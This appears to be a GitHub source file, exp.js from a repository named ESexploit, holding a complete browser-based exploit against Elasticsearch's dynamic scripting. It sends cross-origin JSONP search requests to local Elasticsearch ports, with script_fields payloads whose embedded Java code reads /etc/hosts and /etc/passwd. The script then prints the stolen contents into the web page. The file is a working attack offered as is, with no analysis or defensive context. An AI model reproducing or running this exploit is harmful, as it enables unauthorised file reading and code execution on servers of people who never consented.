ESexploit/exp.js at master · Urbelis/ESexploit · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74

var read_file;

read_file = function(filename) {
  return ("import java.util.*;\nimport java.io.*;\nnew Scanner(new File(\"" + filename + "\")).useDelimiter(\"\\\\Z\").next();");
};

$(function() {
  var payload, filename, files, host, _i, _len;
  files = ["/etc/hosts", "/etc/passwd"];
  payload = {
    "size": 1,
    "query": {
      "filtered": {
        "query": {
          "match_all": {}
        }
      }
    },
    "script_fields": {}
  };
  for (_i = 0, _len = files.length; _i < _len; _i++) {
    filename = files[_i];
    payload["script_fields"][filename] = {
      "script": read_file(filename)
    };
  }
  $.getJSON("http://localhost:9200/_search?source=" + (encodeURIComponent(JSON.stringify(payload))) + "&callback=?", function(data) {
    var content, contents, hit, _j, _len1, _ref, _results;
    console.log(data);
    _ref = data["hits"]["hits"];
    _results = [];
    for (_j = 0, _len1 = _ref.length; _j < _len1; _j++) {
      hit = _ref[_j];
      _results.push((function() {
        var _k, _len2, _ref1;
        _ref1 = hit["fields"];
        for (filename in _ref1) {
          contents = _ref1[filename];
          document.body.innerHTML += ("<h2>" + filename + "</h2>");
          for (_k = 0, _len2 = contents.length; _k < _len2; _k++) {
            content = contents[_k];
            document.body.innerHTML += ("<pre>" + content + "</pre>");
          }
          document.body.innerHTML += ("<hr>");
        }
      })());
    }
    return _results;
  });
  $.getJSON("http://localhost:19200/_search?source=" + (encodeURIComponent(JSON.stringify(payload))) + "&callback=?", function(data){
    var content, contents, hit, _j, _len1, _ref, _results;
    console.log(data);
    _ref = data["hits"]["hits"];
    _results = [];
    for (_j = 0, _len1 = _ref.length; _j < _len1; _j++) {
      hit = _ref[_j];
      _results.push((function() {
        var _k, _len2, _ref1;
        _ref1 = hit["fields"];
        for (filename in _ref1) {
          contents = _ref1[filename];
          document.body.innerHTML += ("<h2>" + filename + "</h2>");
          for (_k = 0, _len2 = contents.length; _k < _len2; _k++) {
            content = contents[_k];
            document.body.innerHTML += ("<pre>" + content + "</pre>");
          }
          document.body.innerHTML += ("<hr>");
        }
      })());
    }
    return _results;
  });
});